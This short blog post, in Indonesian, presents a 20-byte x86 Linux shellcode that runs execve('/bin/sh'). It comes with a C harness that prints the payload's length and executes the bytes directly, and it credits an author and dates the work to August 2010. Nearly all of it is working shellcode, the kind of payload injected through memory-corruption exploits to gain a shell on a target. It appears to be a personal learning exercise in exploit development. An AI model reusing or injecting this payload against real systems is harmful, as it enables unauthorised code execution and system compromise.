20 Bytes “/bin/sh” Shellcode

Akhirnya… Shellcode pertama… ?

/*
Name : 20 bytes "/bin/sh" shellcode - execve(/bin/sh,..,..)
Info : this shell workout without zeroing registers it used first (eax,ebx,ecx)
Author : otoy
Blog : http://otoyrood.wordpress.com
Date : August 2010
Tested on: ubuntu 8.04 & Backtrack 4
*/

#include <stdio.h>

char shellcode[] =
"\xeb\x06" /* jmp 8048068 */
"\x5b" /* pop %ebx */
"\x8d\x41\x0b" /* lea 0xb(%ecx),%eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xf5\xff\xff\xff" /* call 8048062 */
"\x2f" /* das */
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
"\x2f" /* das */
"\x73\x68"; /* jae 80480dc */

int main(void)
{
fprintf(stdout,"[*] Shellcode length: %dn",strlen(shellcode));
((void (*)(void)) shellcode)();

return 0;
}